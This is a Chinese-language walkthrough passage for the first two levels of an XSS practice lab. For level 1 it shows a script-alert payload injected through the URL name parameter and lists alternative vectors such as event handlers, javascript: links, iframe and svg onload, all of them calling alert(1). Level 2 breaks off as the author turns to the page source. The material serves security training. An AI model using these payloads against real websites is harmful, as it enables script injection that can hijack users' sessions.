1.第一关
页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。
看起来应该没有任何的过滤,我们直接输入语句尝试:
<script>alert(1)</script>
这里还可以用很多方法,以下列举一些常用的方法:
<input type=“text” onmouseover=alert(1)>
<a href="javascript:alert(1)">a</a>
<a onmouseover=“javascript:alert(1)”>a</a>
<image src=1 onerror=alert(1)>
<iframe src=‘javascript:alert(1)’>
<iframe onload=alert(1)>
<svg onload=alert(1)>
2.第二关
我们从url中发现还是明显的get传参,level2 多增加了搜索框。
我们依旧通过基本语句尝试一下。
发现并没有什么作用,我们查看一下网页的源码: